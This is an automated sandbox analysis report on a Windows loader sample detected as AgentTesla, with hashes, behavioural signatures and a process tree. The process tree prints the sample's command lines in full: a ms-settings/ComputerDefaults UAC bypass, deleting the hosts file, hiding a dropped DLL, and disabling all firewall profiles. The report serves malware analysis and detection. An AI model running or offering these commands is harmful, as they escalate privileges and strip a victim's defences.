Analysis
-
max time kernel
149s -
max time network
148s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
31/08/2024, 17:37
Static task
static1
Behavioral task
behavioral1
Sample
DarkWareLoader.exe
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
DarkWareLoader.exe
Resource
win10v2004-20240802-en
General
-
Target
DarkWareLoader.exe
-
Size
2.3MB
-
MD5
c42b185841679c16a7aed9ccf48e0d0d
-
SHA1
0c6ad1cc0e6e8706c5913a8604d42449549c4da3
-
SHA256
03bb14890ec3a3cdf397f6af5e87d4cdf122b564a64f89c5b6672e5cbcc57b01
-
SHA512
c8ce057772905b620a9ea1910ce72410d49b327ce5256a6cf594d4a1df17bb3eed4a2b6664988c755b58ec31ee6e76ba87230edeb56c574e3b8bd0ff5c63135f
-
SSDEEP
49152:4CI01yYHlo9MayICF/Xo1U7AZecga2jp:4CIAyYFS8w3UJd
Malware Config
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
AgentTesla payload 1 IoCs
resource yara_rule behavioral2/memory/1676-34-0x00000000067F0000-0x0000000006A02000-memory.dmp family_agenttesla -
Checks computer location settings 2 TTPs 6 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Control Panel\International\Geo\Nation DarkWareLoader.exe Key value queried \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Control Panel\International\Geo\Nation wscript.exe Key value queried \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Control Panel\International\Geo\Nation wscript.exe Key value queried \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Control Panel\International\Geo\Nation wscript.exe Key value queried \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Control Panel\International\Geo\Nation wscript.exe Key value queried \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Control Panel\International\Geo\Nation wscript.exe -
Executes dropped EXE 3 IoCs
pid Process 2420 concv1.exe 1676 DarkWare.exe 2392 CuteCats.jpeg -
pid Process 2532 powershell.exe -
Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 23 raw.githubusercontent.com 24 raw.githubusercontent.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 53 checkip.amazonaws.com -
Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs
pid Process 2120 cmd.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 2392 CuteCats.jpeg 2392 CuteCats.jpeg -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\ntshrui.dll attrib.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language DarkWare.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 dllhost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString dllhost.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS DarkWare.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer DarkWare.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemVersion DarkWare.exe -
Modifies registry class 55 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\ms-settings\Shell\Open\command reg.exe Key deleted \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\ms-settings\Shell\Open reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\ms-settings\Shell\Open\command\DelegateExecute reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\ms-settings\Shell\Open\command\ = "wscript.exe C:\\Users\\Admin\\AppData\\Local\\Temp\\257466.vbs" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\ms-settings\Shell\Open\command\DelegateExecute reg.exe Key deleted \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\ms-settings reg.exe Key created \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\ms-settings\Shell\Open\command reg.exe Key deleted \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\ms-settings\Shell\Open\command reg.exe Key created \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\ms-settings reg.exe Key deleted \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\ms-settings\Shell reg.exe Key deleted \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\ms-settings reg.exe Key deleted \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\ms-settings reg.exe Key deleted \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\ms-settings\Shell reg.exe Key deleted \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\ms-settings\Shell\Open reg.exe Key deleted \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\ms-settings\Shell\Open\command reg.exe Key deleted \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\ms-settings\Shell\Open reg.exe Key deleted \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\ms-settings\Shell reg.exe Key created \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\ms-settings\Shell\Open\command reg.exe Key created \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\ms-settings\Shell reg.exe Key created \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\ms-settings\Shell\Open\command reg.exe Key created \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\ms-settings reg.exe Key deleted \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\ms-settings\Shell\Open reg.exe Key created \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\ms-settings\Shell\Open\command reg.exe Key created \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\ms-settings\Shell\Open reg.exe Key created \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\ms-settings\Shell\Open\command reg.exe Key deleted \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\ms-settings reg.exe Key created \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\ms-settings\Shell reg.exe Key deleted \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\ms-settings\Shell\Open reg.exe Key deleted \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\ms-settings\Shell reg.exe Key created \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\ms-settings\Shell reg.exe Key created \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\ms-settings reg.exe Key created \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\ms-settings\Shell\Open reg.exe Key created \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\ms-settings\Shell reg.exe Key created \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\ms-settings reg.exe Key created \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\ms-settings\Shell reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\ms-settings\Shell\Open\command\DelegateExecute reg.exe Key deleted \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\ms-settings\Shell\Open\command reg.exe Key created \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\ms-settings\Shell\Open reg.exe Key deleted \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\ms-settings reg.exe Key created \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\ms-settings\Shell\Open reg.exe Key created \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\ms-settings reg.exe Key deleted \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\ms-settings\Shell reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\ms-settings\Shell\Open\command\ = "wscript.exe C:\\Users\\Admin\\AppData\\Local\\Temp\\399853.vbs" reg.exe Key created \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\ms-settings\Shell\Open reg.exe Key created \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\ms-settings\Shell\Open\command reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\ms-settings\Shell\Open\command\ = "wscript.exe C:\\Users\\Admin\\AppData\\Local\\Temp\\716334.vbs" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\ms-settings\Shell\Open\command\DelegateExecute reg.exe Key created \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\ms-settings\Shell\Open\command reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\ms-settings\Shell\Open\command\DelegateExecute reg.exe Key deleted \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\ms-settings\Shell\Open\command reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\ms-settings\Shell\Open\command\ = "wscript.exe C:\\Users\\Admin\\AppData\\Local\\Temp\\180759.vbs" reg.exe Key deleted \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\ms-settings\Shell\Open\command reg.exe Key created \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\ms-settings\Shell\Open\command reg.exe Key created \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\ms-settings\Shell\Open\command reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\ms-settings\Shell\Open\command\ = "wscript.exe C:\\Users\\Admin\\AppData\\Local\\Temp\\905019.vbs" reg.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2532 powershell.exe 2532 powershell.exe 4284 dllhost.exe 4284 dllhost.exe 4284 dllhost.exe 4284 dllhost.exe 4284 dllhost.exe 4284 dllhost.exe 4284 dllhost.exe 4284 dllhost.exe 4284 dllhost.exe 4284 dllhost.exe 4284 dllhost.exe 4284 dllhost.exe 2392 CuteCats.jpeg 2392 CuteCats.jpeg 4284 dllhost.exe 4284 dllhost.exe 4284 dllhost.exe 4284 dllhost.exe 4284 dllhost.exe 4284 dllhost.exe 4284 dllhost.exe 4284 dllhost.exe 4284 dllhost.exe 4284 dllhost.exe 4284 dllhost.exe 4284 dllhost.exe 4284 dllhost.exe 4284 dllhost.exe 4284 dllhost.exe 4284 dllhost.exe 4284 dllhost.exe 4284 dllhost.exe 4284 dllhost.exe 4284 dllhost.exe 4284 dllhost.exe 4284 dllhost.exe 4284 dllhost.exe 4284 dllhost.exe 4284 dllhost.exe 4284 dllhost.exe 4284 dllhost.exe 4284 dllhost.exe 4284 dllhost.exe 4284 dllhost.exe 4284 dllhost.exe 4284 dllhost.exe 4284 dllhost.exe 4284 dllhost.exe 4284 dllhost.exe 4284 dllhost.exe 4284 dllhost.exe 4284 dllhost.exe 4284 dllhost.exe 4284 dllhost.exe 4284 dllhost.exe 4284 dllhost.exe 4284 dllhost.exe 4284 dllhost.exe 4284 dllhost.exe 4284 dllhost.exe 4284 dllhost.exe 4284 dllhost.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process Token: SeDebugPrivilege 3056 DarkWareLoader.exe Token: SeDebugPrivilege 1676 DarkWare.exe Token: SeDebugPrivilege 2532 powershell.exe Token: SeIncreaseQuotaPrivilege 2532 powershell.exe Token: SeSecurityPrivilege 2532 powershell.exe Token: SeTakeOwnershipPrivilege 2532 powershell.exe Token: SeLoadDriverPrivilege 2532 powershell.exe Token: SeSystemProfilePrivilege 2532 powershell.exe Token: SeSystemtimePrivilege 2532 powershell.exe Token: SeProfSingleProcessPrivilege 2532 powershell.exe Token: SeIncBasePriorityPrivilege 2532 powershell.exe Token: SeCreatePagefilePrivilege 2532 powershell.exe Token: SeBackupPrivilege 2532 powershell.exe Token: SeRestorePrivilege 2532 powershell.exe Token: SeShutdownPrivilege 2532 powershell.exe Token: SeDebugPrivilege 2532 powershell.exe Token: SeSystemEnvironmentPrivilege 2532 powershell.exe Token: SeRemoteShutdownPrivilege 2532 powershell.exe Token: SeUndockPrivilege 2532 powershell.exe Token: SeManageVolumePrivilege 2532 powershell.exe Token: 33 2532 powershell.exe Token: 34 2532 powershell.exe Token: 35 2532 powershell.exe Token: 36 2532 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 4284 dllhost.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3056 wrote to memory of 2420 3056 DarkWareLoader.exe 84 PID 3056 wrote to memory of 2420 3056 DarkWareLoader.exe 84 PID 3056 wrote to memory of 1676 3056 DarkWareLoader.exe 85 PID 3056 wrote to memory of 1676 3056 DarkWareLoader.exe 85 PID 3056 wrote to memory of 1676 3056 DarkWareLoader.exe 85 PID 2420 wrote to memory of 1612 2420 concv1.exe 92 PID 2420 wrote to memory of 1612 2420 concv1.exe 92 PID 1612 wrote to memory of 1412 1612 cmd.exe 94 PID 1612 wrote to memory of 1412 1612 cmd.exe 94 PID 2420 wrote to memory of 4564 2420 concv1.exe 96 PID 2420 wrote to memory of 4564 2420 concv1.exe 96 PID 4564 wrote to memory of 332 4564 cmd.exe 98 PID 4564 wrote to memory of 332 4564 cmd.exe 98 PID 4564 wrote to memory of 1176 4564 cmd.exe 99 PID 4564 wrote to memory of 1176 4564 cmd.exe 99 PID 2420 wrote to memory of 3688 2420 concv1.exe 100 PID 2420 wrote to memory of 3688 2420 concv1.exe 100 PID 3688 wrote to memory of 3620 3688 cmd.exe 102 PID 3688 wrote to memory of 3620 3688 cmd.exe 102 PID 3620 wrote to memory of 4856 3620 ComputerDefaults.exe 103 PID 3620 wrote to memory of 4856 3620 ComputerDefaults.exe 103 PID 4856 wrote to memory of 2812 4856 wscript.exe 104 PID 4856 wrote to memory of 2812 4856 wscript.exe 104 PID 2420 wrote to memory of 4268 2420 concv1.exe 106 PID 2420 wrote to memory of 4268 2420 concv1.exe 106 PID 2420 wrote to memory of 924 2420 concv1.exe 108 PID 2420 wrote to memory of 924 2420 concv1.exe 108 PID 924 wrote to memory of 2396 924 cmd.exe 110 PID 924 wrote to memory of 2396 924 cmd.exe 110 PID 2420 wrote to memory of 4284 2420 concv1.exe 114 PID 2420 wrote to memory of 4284 2420 concv1.exe 114 PID 2420 wrote to memory of 4284 2420 concv1.exe 114 PID 2420 wrote to memory of 4284 2420 concv1.exe 114 PID 2420 wrote to memory of 4284 2420 concv1.exe 114 PID 2420 wrote to memory of 4284 2420 concv1.exe 114 PID 2420 wrote to memory of 4284 2420 concv1.exe 114 PID 2420 wrote to memory of 4284 2420 concv1.exe 114 PID 2420 wrote to memory of 4284 2420 concv1.exe 114 PID 2420 wrote to memory of 4284 2420 concv1.exe 114 PID 2420 wrote to memory of 4284 2420 concv1.exe 114 PID 4284 wrote to memory of 5024 4284 dllhost.exe 115 PID 4284 wrote to memory of 5024 4284 dllhost.exe 115 PID 5024 wrote to memory of 264 5024 cmd.exe 117 PID 5024 wrote to memory of 264 5024 cmd.exe 117 PID 4284 wrote to memory of 4412 4284 dllhost.exe 118 PID 4284 wrote to memory of 4412 4284 dllhost.exe 118 PID 4412 wrote to memory of 1580 4412 cmd.exe 120 PID 4412 wrote to memory of 1580 4412 cmd.exe 120 PID 4412 wrote to memory of 3864 4412 cmd.exe 121 PID 4412 wrote to memory of 3864 4412 cmd.exe 121 PID 4284 wrote to memory of 4724 4284 dllhost.exe 122 PID 4284 wrote to memory of 4724 4284 dllhost.exe 122 PID 4724 wrote to memory of 1408 4724 cmd.exe 124 PID 4724 wrote to memory of 1408 4724 cmd.exe 124 PID 1408 wrote to memory of 3452 1408 ComputerDefaults.exe 125 PID 1408 wrote to memory of 3452 1408 ComputerDefaults.exe 125 PID 3452 wrote to memory of 3088 3452 wscript.exe 126 PID 3452 wrote to memory of 3088 3452 wscript.exe 126 PID 4284 wrote to memory of 2832 4284 dllhost.exe 128 PID 4284 wrote to memory of 2832 4284 dllhost.exe 128 PID 4284 wrote to memory of 2484 4284 dllhost.exe 130 PID 4284 wrote to memory of 2484 4284 dllhost.exe 130 PID 2484 wrote to memory of 1444 2484 cmd.exe 132 PID 2484 wrote to memory of 1444 2484 cmd.exe 132 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 5000 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\DarkWareLoader.exe"C:\Users\Admin\AppData\Local\Temp\DarkWareLoader.exe"1⤵
- Checks computer location settings
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3056 -
C:\Users\Admin\AppData\Local\Temp\concv1.exe"C:\Users\Admin\AppData\Local\Temp\concv1.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2420 -
C:\Windows\system32\cmd.exe/c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f3⤵
- Suspicious use of WriteProcessMemory
PID:1612 -
C:\Windows\system32\reg.exereg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f4⤵PID:1412
-
-
-
C:\Windows\system32\cmd.exe/c reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\905019.vbs" /f & reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f3⤵
- Suspicious use of WriteProcessMemory
PID:4564 -
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\905019.vbs" /f4⤵
- Modifies registry class
PID:332
-
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f4⤵
- Modifies registry class
PID:1176
-
-
-
C:\Windows\system32\cmd.exe/c start /B ComputerDefaults.exe3⤵
- Suspicious use of WriteProcessMemory
PID:3688 -
C:\Windows\system32\ComputerDefaults.exeComputerDefaults.exe4⤵
- Suspicious use of WriteProcessMemory
PID:3620 -
C:\Windows\system32\wscript.exe"wscript.exe" C:\Users\Admin\AppData\Local\Temp\905019.vbs5⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4856 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C del C:\Windows\System32\drivers\etc\hosts6⤵PID:2812
-
-
-
-
-
C:\Windows\system32\cmd.exe/c del /f C:\Users\Admin\AppData\Local\Temp\905019.vbs3⤵PID:4268
-
-
C:\Windows\system32\cmd.exe/c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f3⤵
- Suspicious use of WriteProcessMemory
PID:924 -
C:\Windows\system32\reg.exereg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f4⤵
- Modifies registry class
PID:2396
-
-
-
C:\Windows\System32\dllhost.exe"C:\Windows\System32\dllhost.exe"3⤵
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4284 -
C:\Windows\system32\cmd.exe/c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f4⤵
- Suspicious use of WriteProcessMemory
PID:5024 -
C:\Windows\system32\reg.exereg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f5⤵PID:264
-
-
-
C:\Windows\system32\cmd.exe/c reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\257466.vbs" /f & reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f4⤵
- Suspicious use of WriteProcessMemory
PID:4412 -
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\257466.vbs" /f5⤵
- Modifies registry class
PID:1580
-
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f5⤵
- Modifies registry class
PID:3864
-
-
-
C:\Windows\system32\cmd.exe/c start /B ComputerDefaults.exe4⤵
- Suspicious use of WriteProcessMemory
PID:4724 -
C:\Windows\system32\ComputerDefaults.exeComputerDefaults.exe5⤵
- Suspicious use of WriteProcessMemory
PID:1408 -
C:\Windows\system32\wscript.exe"wscript.exe" C:\Users\Admin\AppData\Local\Temp\257466.vbs6⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3452 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c move "C:\Users\Admin\AppData\Local\Temp\7876565.tmp" "C:\Windows\ntshrui.dll"7⤵PID:3088
-
-
-
-
-
C:\Windows\system32\cmd.exe/c del /f C:\Users\Admin\AppData\Local\Temp\257466.vbs4⤵PID:2832
-
-
C:\Windows\system32\cmd.exe/c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f4⤵
- Suspicious use of WriteProcessMemory
PID:2484 -
C:\Windows\system32\reg.exereg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f5⤵
- Modifies registry class
PID:1444
-
-
-
C:\Windows\system32\cmd.exe/c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f4⤵PID:3752
-
C:\Windows\system32\reg.exereg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f5⤵PID:2456
-
-
-
C:\Windows\system32\cmd.exe/c reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\180759.vbs" /f & reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f4⤵PID:1696
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\180759.vbs" /f5⤵
- Modifies registry class
PID:5096
-
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f5⤵
- Modifies registry class
PID:3068
-
-
-
C:\Windows\system32\cmd.exe/c start /B ComputerDefaults.exe4⤵PID:2360
-
C:\Windows\system32\ComputerDefaults.exeComputerDefaults.exe5⤵PID:924
-
C:\Windows\system32\wscript.exe"wscript.exe" C:\Users\Admin\AppData\Local\Temp\180759.vbs6⤵
- Checks computer location settings
PID:3908 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C attrib +h "C:\Windows\ntshrui.dll"7⤵
- Hide Artifacts: Hidden Files and Directories
PID:2120 -
C:\Windows\system32\attrib.exeattrib +h "C:\Windows\ntshrui.dll"8⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:5000
-
-
-
-
-
-
C:\Windows\system32\cmd.exe/c del /f C:\Users\Admin\AppData\Local\Temp\180759.vbs4⤵PID:1192
-
-
C:\Windows\system32\cmd.exe/c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f4⤵PID:4944
-
C:\Windows\system32\reg.exereg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f5⤵
- Modifies registry class
PID:3132
-
-
-
C:\Windows\system32\cmd.exe/c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f4⤵PID:3744
-
C:\Windows\system32\reg.exereg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f5⤵PID:3992
-
-
-
C:\Windows\system32\cmd.exe/c reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\399853.vbs" /f & reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f4⤵PID:1232
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\399853.vbs" /f5⤵
- Modifies registry class
PID:5112
-
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f5⤵
- Modifies registry class
PID:4940
-
-
-
C:\Windows\system32\cmd.exe/c start /B ComputerDefaults.exe4⤵PID:4516
-
C:\Windows\system32\ComputerDefaults.exeComputerDefaults.exe5⤵PID:4896
-
C:\Windows\system32\wscript.exe"wscript.exe" C:\Users\Admin\AppData\Local\Temp\399853.vbs6⤵
- Checks computer location settings
PID:2104 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Privacy\LetAppsAccessLocation\ /f /v Value /t REG_DWORD /d 0 >nul7⤵PID:3668
-
C:\Windows\system32\reg.exeREG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Privacy\LetAppsAccessLocation\ /f /v Value /t REG_DWORD /d 08⤵PID:4324
-
-
-
-
-
-
C:\Windows\system32\cmd.exe/c del /f C:\Users\Admin\AppData\Local\Temp\399853.vbs4⤵PID:2308
-
-
C:\Windows\system32\cmd.exe/c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f4⤵PID:2084
-
C:\Windows\system32\reg.exereg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f5⤵
- Modifies registry class
PID:4116
-
-
-
C:\Windows\system32\cmd.exe/c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f4⤵PID:4640
-
C:\Windows\system32\reg.exereg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f5⤵PID:4808
-
-
-
C:\Windows\system32\cmd.exe/c reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\716334.vbs" /f & reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f4⤵PID:3780
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\716334.vbs" /f5⤵
- Modifies registry class
PID:3960
-
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f5⤵
- Modifies registry class
PID:3724
-
-
-
C:\Windows\system32\cmd.exe/c start /B ComputerDefaults.exe4⤵PID:744
-
C:\Windows\system32\ComputerDefaults.exeComputerDefaults.exe5⤵PID:3752
-
C:\Windows\system32\wscript.exe"wscript.exe" C:\Users\Admin\AppData\Local\Temp\716334.vbs6⤵
- Checks computer location settings
PID:5096 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C powershell Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False7⤵PID:4164
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2532
-
-
-
-
-
-
C:\Windows\system32\cmd.exe/c del /f C:\Users\Admin\AppData\Local\Temp\716334.vbs4⤵PID:2312
-
-
C:\Windows\system32\cmd.exe/c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f4⤵PID:952
-
C:\Windows\system32\reg.exereg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f5⤵
- Modifies registry class
PID:4336
-
-
-
